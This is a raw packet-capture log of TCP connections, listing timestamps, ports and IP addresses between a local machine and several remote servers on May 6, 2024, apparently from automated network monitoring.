May 6, 2024 07:53:12.312007904 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312021017 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312031031 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312031984 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312043905 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312055111 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312063932 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312077045 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312089920 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312096119 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312107086 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312112093 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312120914 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312130928 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312134981 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312144041 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312155962 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312167883 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312170982 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312182903 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312202930 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312221050 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312247038 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312259912 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312269926 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312282085 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312284946 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312295914 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312308073 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312319994 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312362909 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312375069 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312386036 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312398911 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312398911 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312411070 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312421083 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312423944 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312433958 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312436104 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312448978 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312460899 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312464952 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312473059 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312478065 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312486887 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312500000 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312501907 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312526941 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312536001 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312540054 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312553883 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312556028 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312561989 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312567949 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312578917 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312580109 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312591076 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312591076 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312603951 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312608004 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312619925 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312628984 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312632084 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312645912 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312665939 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312671900 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312679052 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312690973 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312700987 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312701941 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312716007 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312722921 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312727928 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312738895 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312747955 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312760115 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312761068 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312776089 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312787056 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312793970 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312809944 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312812090 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312823057 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312834024 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312844992 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312849998 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312858105 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312861919 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312875986 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312876940 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312889099 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312899113 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312906981 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312932014 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.312958002 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312973022 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312984943 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312995911 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313000917 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313008070 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313009977 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313018084 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313023090 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313035011 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313036919 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313066006 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313069105 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313080072 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313082933 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313097000 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313106060 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313110113 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313127995 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313137054 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313142061 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313153028 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313164949 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313175917 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313179970 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313188076 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313199043 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313204050 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313210964 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313222885 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313226938 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313237906 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313263893 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313273907 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313287020 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313298941 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313314915 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313337088 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313366890 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313380003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313390970 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313400984 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313405991 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313414097 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313425064 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313429117 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313437939 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313447952 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313453913 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313461065 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313465118 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313474894 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313488007 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313508987 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313530922 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313541889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313554049 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313564062 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313570976 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313575029 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313587904 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313592911 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313600063 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313615084 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313622952 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313622952 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313636065 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313648939 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313658953 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313668013 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313672066 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313684940 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313694954 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313698053 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313719988 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313730001 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313731909 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313744068 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313766003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313769102 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313779116 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313791990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313801050 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313824892 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313929081 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313941002 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.313962936 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.313986063 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.314189911 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.314202070 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.314213991 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.314225912 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.314228058 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.314235926 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.314238071 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.314254045 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.314261913 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.314263105 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.314280033 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.314296961 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.329957008 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.330029964 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578635931 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578655005 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578668118 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578691959 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578721046 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578728914 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578742027 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578758001 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578767061 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578772068 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578784943 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578795910 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578807116 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578809023 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578820944 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578836918 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578847885 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578850985 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578861952 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578874111 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578880072 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578886032 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578892946 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578910112 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578928947 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578934908 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578943014 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578955889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578968048 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578969955 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578982115 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578984976 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.578994989 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.578996897 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579006910 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579025984 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579029083 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579047918 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579051971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579061985 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579072952 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579075098 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579094887 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579096079 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579113960 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579123020 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579128981 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579140902 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579147100 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579154968 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579160929 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579186916 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579224110 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579236984 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579247952 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579261065 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579261065 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579272032 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579287052 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579310894 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579313040 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579325914 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579336882 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579348087 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579353094 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579360962 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579370975 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579374075 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579387903 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579399109 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579400063 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579411030 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579416037 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579444885 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579454899 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579468966 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579471111 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579480886 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579494953 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579497099 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579511881 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579514027 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579520941 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579524040 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579540968 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579546928 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579559088 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579560995 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579572916 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579582930 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579583883 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579598904 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579608917 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579608917 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579627991 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579636097 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579639912 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579653025 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579653978 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579668045 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579678059 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579703093 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579710960 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579722881 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579736948 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579747915 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579751015 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579758883 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.579776049 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.579802036 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:13.600503922 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:13.600815058 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:13.871531963 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:13.871588945 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:13.871908903 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:13.902251005 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:13.931765079 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:13.963887930 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:13.963920116 CEST	443	49744	104.21.30.191	192.168.2.4
May 6, 2024 07:53:13.964030981 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:13.965162039 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:13.965176105 CEST	443	49744	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.141696930 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143613100 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143644094 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143656015 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143665075 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143670082 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143682003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143695116 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143702984 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143707991 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143728971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143734932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143743038 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143768072 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143780947 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143802881 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143814087 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143834114 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143836975 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143855095 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143872023 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143876076 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143896103 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143918037 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.143928051 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143949032 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.143970013 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144001961 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144010067 CEST	80	49743	193.233.132.253	192.168.2.4
